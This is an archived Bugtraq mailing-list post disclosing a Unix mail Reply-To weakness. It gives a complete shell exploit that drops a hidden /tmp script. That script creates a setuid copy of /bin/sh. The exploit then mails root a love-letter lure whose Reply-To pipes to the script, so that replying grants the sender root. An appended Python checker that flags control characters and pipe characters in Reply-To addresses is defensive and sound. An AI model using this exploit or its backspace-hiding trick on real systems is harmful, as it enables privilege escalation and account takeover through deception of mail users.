[17509] in bugtraq
mail Reply-To field exploit
daemon@ATHENA.MIT.EDU (gregory duchemin)
Mon Nov 6 02:59:24 2000
Mime-Version: 1.0
Content-Type: text/plain; format=flowed
Message-Id: <F282z4r02V5xm4iZrbU00009213@hotmail.com>
Date: Sun, 5 Nov 2000 21:56:17 GMT
Reply-To: gregory duchemin <c3rb3r@HOTMAIL.COM>
From: gregory duchemin <c3rb3r@HOTMAIL.COM>
To: BUGTRAQ@SECURITYFOCUS.COM
hi all,
because there are few people here that didn't seem to understand how
serious is the mail.local/mail/sendmail weakness i reported to bugtraq
a few days ago (lack of imagination?)
here is an exploit, not technically impressive but just powerful enough to
deceive many people around here and take over their account privilege.
I persist to claim that no | char should be allowed in any smtp/lmtp/mime
fields (even in contradiction with any rfc) because of the major security
vulnerability it introduces.
Note: It's NOT A BUG in mail, sendmail or mail.local but a weakness caused
by blind rfc compliance.
I didn't try elm, mailx and others so feedback is welcome.
Payback here is victim account takeover by spawning a setuid shell
in /tmp (even root).
Solution: take care about the reply-to recipient's real anatomy. :)
Cheers,
Gregory Duchemin
I LOVE YOU letter for Unix
==========================
#!/bin/sh
#
# I-Love-U.sh
# Exploit for | char in mail Reply-To field
# tested on linux Caldera (techno preview linux 2.4.0)
#
# Gregory Duchemin ( AKA C3rb3r )
# Security Consultant
#
# NEUROCOM CANADA
# 1001 bd Maisonneuve Ouest
# Montreal (Quebec) H3A 3C8 Canada
# c3rb3r@hotmail.com
# Cook Ingredients: one | char (hidden in an uppercase i),
# a bit of evil ^H to hide "/tmp/", and a girl to stimulate a reply ;)
#
cd /tmp
# Write the helper script that the victim's mail client ends up running.
# The five ^H are literal backspace (0x08) bytes: the file is really named
# "^H^H^H^H^Hsabelle@hotmail.com", so the path "/tmp/<file>" displays as
# "sabelle@hotmail.com" on a terminal. The ">" is required: without it cat
# only copies the here-document to stdout and no file is created.
cat > ^H^H^H^H^Hsabelle@hotmail.com << _End
#!/bin/sh
cp /bin/sh /tmp/newsh
chmod a+rws /tmp/newsh
_End
# Feed a minimal SMTP session to the local MTA. The Reply-To header carries
# the disguised "|/tmp/<file>" command; the sleeps give the server time to
# answer each line before the next one is sent.
{
sleep 1
echo "HELO hotmail.com"
sleep 1
echo "MAIL FROM:<Isabelle@hotmail.com>"
sleep 1
echo "RCPT TO:<root>"
sleep 1
echo "DATA"
sleep 1
# Reply-To will appear as Reply-To:<|sabelle@hotmail.com>
echo "Reply-To:<|/tmp/^H^H^H^H^Hsabelle@hotmail.com>"
sleep 1
echo
echo "I saw you yesterday, since i'm a bit confused..i just wanted"
echo "to say you."
echo "I believe I LOVE YOU"
echo
echo "Isabelle."
echo "."
sleep 1
echo "QUIT"
sleep 2
} | telnet localhost 25
echo "Job is done...now check for newsh in /tmp"
echo
echo
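The post's defensive advice ("take care about the reply-to recipient's real anatomy") amounts to inspecting the raw bytes of the address rather than what a terminal shows. The following Python is an added example, not part of the original post and not code from any mail client: it extracts the address from a Reply-To/From header value, renders it the way a dumb terminal would (backspaces erasing the character before them) so the display trick becomes visible, and reports control bytes, shell metacharacters such as a leading `|`, and anything that is not a plain local@domain address. The sample header values are constructed here; the strict address pattern deliberately rejects characters such as `|` that RFC 5322 would permit in a local part, which is the stance the post argues for.

```python
import re
from typing import List

# Constructed sample header values (not taken from the post). "\x08" is a
# literal backspace byte, the same trick the post uses to hide "/tmp/".
SAMPLES = {
    "clean":       "Reply-To: Isabelle <isabelle@example.com>",
    "plain_pipe":  "Reply-To: <|sabelle@example.com>",
    "hidden_pipe": "Reply-To: <|/tmp/\x08\x08\x08\x08\x08sabelle@example.com>",
}

# Characters a shell-invoking mail client could interpret when it expands a
# recipient; a leading "|" is the case the post describes.
SHELL_METACHARS = set('|;&$`<>(){}\\"\'!\n\r')

# Deliberately stricter than RFC 5322: only letters, digits and ._+- in the
# local part, a dotted domain, nothing else.
ADDR_SPEC = re.compile(r'^[A-Za-z0-9._+-]+@[A-Za-z0-9-]+(\.[A-Za-z0-9-]+)+$')


def extract_address(header_value: str) -> str:
    """Return the raw address from a header value or full 'Name: value' line.

    Angle-bracket content wins when present, otherwise the whole value is used.
    Nothing is decoded or stripped inside the address: the point is to look at
    the bytes exactly as the mail client will see them.
    """
    value = header_value
    lowered = value.lower()
    if lowered.startswith(("reply-to:", "from:")):
        value = value.split(":", 1)[1]
    value = value.strip()
    match = re.search(r"<([^>]*)>", value)
    return match.group(1) if match else value


def visible_form(raw: str) -> str:
    """Render a string as a dumb terminal would show it.

    Each backspace (0x08) erases the previously printed character, so the
    result is what a human reading the header on screen actually sees.
    """
    shown: List[str] = []
    for ch in raw:
        if ch == "\x08":
            if shown:
                shown.pop()
        else:
            shown.append(ch)
    return "".join(shown)


def audit_reply_to(header_value: str) -> List[str]:
    """Return findings for the raw address; an empty list means it is clean."""
    addr = extract_address(header_value)
    findings: List[str] = []
    if any(ord(c) < 0x20 or ord(c) == 0x7F for c in addr):
        findings.append("control-char")
    if set(addr) & SHELL_METACHARS:
        findings.append("shell-metachar")
    if not ADDR_SPEC.match(addr):
        findings.append("not-addr-spec")
    return findings


def is_safe_reply_to(header_value: str) -> bool:
    """True only when the raw address passes every check above."""
    return not audit_reply_to(header_value)


if __name__ == "__main__":
    for name, header in SAMPLES.items():
        raw = extract_address(header)
        print(f"{name:12} shown as {visible_form(raw)!r:28} raw {raw!r}")
        print(f"{'':12} findings: {audit_reply_to(header) or 'none'}")
```

Run directly, the script prints each sample twice: as a terminal would display it (the hidden and plain pipe cases both look like `|sabelle@example.com`, which a reader easily mistakes for "Isabelle") and as the raw bytes the mail client will actually hand to a shell. A mail client or gateway applying `is_safe_reply_to` before it ever treats a Reply-To recipient as a command would refuse both malicious samples while accepting the clean one.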